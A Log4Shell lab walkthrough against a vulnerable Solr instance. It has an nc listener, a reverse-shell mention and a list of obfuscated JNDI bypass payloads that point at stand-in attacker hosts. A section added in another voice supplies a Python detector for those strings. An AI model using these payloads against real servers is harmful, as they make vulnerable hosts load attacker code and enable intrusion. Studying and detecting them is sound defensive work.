log4j Vulnerability

Raghavendra Hiremath
3 min read · Jan 20, 2022

Very smart people are often tricked by hackers, by phishing. …

NOTE: CONTENTS INTRODUCED IN THIS LESSON ARE PURELY FOR LEARNING PURPOSES!

Hello everyone, welcome to another security blog which I wanted to discuss, and it’s “NOT” theory, it’s pure “PRACTICAL”. Before we begin…

Hope you all are doing well and taking care of yourself and family. It’s been a while since I posted any blog, so let’s not waste time. I will try to keep this blog short and minimize the jargon.

On December 9th 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability had a severity score of 10.0 (the most critical) and offers trivial remote code execution on hosts running software that utilizes this log4j version. This attack has been dubbed "Log4Shell".

I have a target machine where the vulnerability is already exposed, with a vulnerable app running on the target VM.

Let’s run nmap with the -v and -p switches to get a complete picture of the open ports and the applications behind them.

I suspect port 8983/tcp, which nmap reports as unknown, is where my Apache Solr application is running. Let us verify by hitting the IP and port.

I clearly noticed that this application uses log4j as its logging mechanism.

The Solr log file includes the entry point params={} and the repeated path /admin/cores.

Let us now try to hit the URL endpoint, adding that path to it.

https://x.x.x.x/solr/admin/cores — we are getting the desired result, where we can supply params

I have enabled an nc listener on port 9999, and we know the general payload to execute will look like this:

${jndi:ldap://ATTACKERCONTROLLEDHOST}

This syntax indicates that log4j will invoke functionality from “JNDI”, the “Java Naming and Directory Interface.” Ultimately, this can be used to access external resources, or “references,” which is what is weaponized in this attack.

We can open the netcat listener and run curl against the target machine to have a backdoor open for you to access the target machine.

You can pass the payload through a script and have a reverse shell enabled for you to access the target machine.

Below are some of the unlimited bypass strings which can be used to hack the machine.

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}

${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.y.z/z}

${${env:xxxxx:-j}ndi${env:xxxxx:-:}${env:xxxxx:-l}dap${env:xxxxx:-:}//attackerendpoint.com/}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}

${${::-j}ndi:rmi://attackerendpoint.com/}
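The reason those strings evade a naive search for the literal text `${jndi:` is that log4j resolves the inner `${lower:…}`, `${upper:…}`, `${::-…}` and `${env:NAME:-…}` lookups first and only then sees the assembled JNDI lookup. A detector therefore has to fold the same lookups before matching. The Python below is an added example written from the defender's side, not code from the original post: it folds those obfuscation forms from the inside out and then looks for a `jndi:` prefix case-insensitively (log4j lower-cases the prefix before matching). It assumes that every real lookup such as `env:` fails on the target so that only the `:-default` branch survives, which is exactly what the obfuscated payloads rely on. The Solr-style log lines, the `params={foo=…}` field and the hostnames in them are constructed sample input, not captured data, and the function names are my own.

```python
"""Fold log4j lookup obfuscation and flag JNDI lookups in log lines.

Added example for defenders; not code from the original post.  The sample
log lines are constructed to resemble a Solr request log and are not a real
capture.  The folding rules mirror the obfuscation forms shown in the post
(lower:, upper:, ::-default, env:NAME:-default); real log4j interpolation
has more lookups than these.
"""
import re
from typing import Iterable, List, Optional, Tuple

# Innermost ${...} expression: nothing nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A lookup whose prefix is jndi, optionally followed by a URL scheme.
# log4j lower-cases the prefix before matching, hence IGNORECASE.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)?", re.IGNORECASE)


def _resolve(content: str) -> Optional[str]:
    """Value one innermost lookup folds to, or None to leave it untouched.

    Assumption: lookups like env:NAME fail on the target, so the ':-default'
    branch is what log4j would emit.  A jndi: lookup is never folded; it is
    the thing we want to see."""
    if content.startswith("lower:"):
        return content[len("lower:"):].lower()
    if content.startswith("upper:"):
        return content[len("upper:"):].upper()
    # ${prefix:key:-default} -> default   (covers ${::-x} and ${env:NAME:-x})
    if not content.strip().lower().startswith("jndi:") and ":-" in content:
        return content.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 64) -> str:
    """Fold obfuscation lookups inside-out until the text stops changing.
    max_rounds bounds the work on deeply nested adversarial input."""
    for _ in range(max_rounds):
        changed = False

        def fold(match: "re.Match[str]") -> str:
            nonlocal changed
            value = _resolve(match.group(1))
            if value is None:
                return match.group(0)  # keep e.g. ${jndi:ldap://...} as-is
            changed = True
            return value

        text = INNERMOST.sub(fold, text)
        if not changed:
            break
    return text


def detect_jndi(text: str) -> Optional[Tuple[str, str]]:
    """(scheme, normalized_text) when a JNDI lookup is present, else None.
    scheme is '' if nothing URL-like follows 'jndi:'."""
    normalized = normalize(text)
    match = JNDI.search(normalized)
    if match is None:
        return None
    return (match.group(1) or "").lower(), normalized


def scan_log(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """(1-based line number, scheme) for every line carrying a JNDI lookup."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        found = detect_jndi(line)
        if found is not None:
            hits.append((number, found[0]))
    return hits


# Constructed sample lines shaped like a Solr request log (not a real capture).
# Lines 2-5 carry the plain payload and three of the bypass strings above;
# line 6 carries a non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    "path=/admin/cores params={action=STATUS&wt=json} status=0 QTime=2",
    "path=/admin/cores params={foo=${jndi:ldap://ATTACKERCONTROLLEDHOST}} status=0 QTime=1",
    "path=/admin/cores params={foo=${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}} status=0 QTime=1",
    "path=/admin/cores params={foo=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.y.z/z}} status=0 QTime=1",
    "path=/admin/cores params={foo=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}} status=0 QTime=1",
    "path=/select params={q=${sys:java.version}&wt=json} status=0 QTime=3",
]

if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG_LINES):
        folded = normalize(SAMPLE_LOG_LINES[number - 1])
        print(f"line {number}: JNDI lookup via {scheme or '?'} -> {folded}")
```

Run as a script it reports lines 2 to 5 (three via ldap, one via rmi) and stays silent on the benign lines. The fold is deliberately conservative: because it cannot know what an `env:` variable actually holds on the target, it always takes the default branch, which is the branch the attacker is counting on, so a miss here means the string would also have failed to assemble in log4j. Detection of this kind belongs in front of the application as a stop-gap only; the fix the post ends on, updating log4j itself, is what removes the lookup behaviour.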

Considering the potential and severity of the vulnerability, I’m stopping the blog here. We will wait until log4j is stable; to mitigate the issue, we need to update log4j to the latest version, along with the libraries, files and methods through which it is exposed.

Happy New Year! to You and Family! Take care everyone.

Raghavendra Hiremath

WE BELIEVE IN FREE AND OPEN SOURCE. My mission is to constantly learn and share the knowledge I gain so that you can use it to empower you.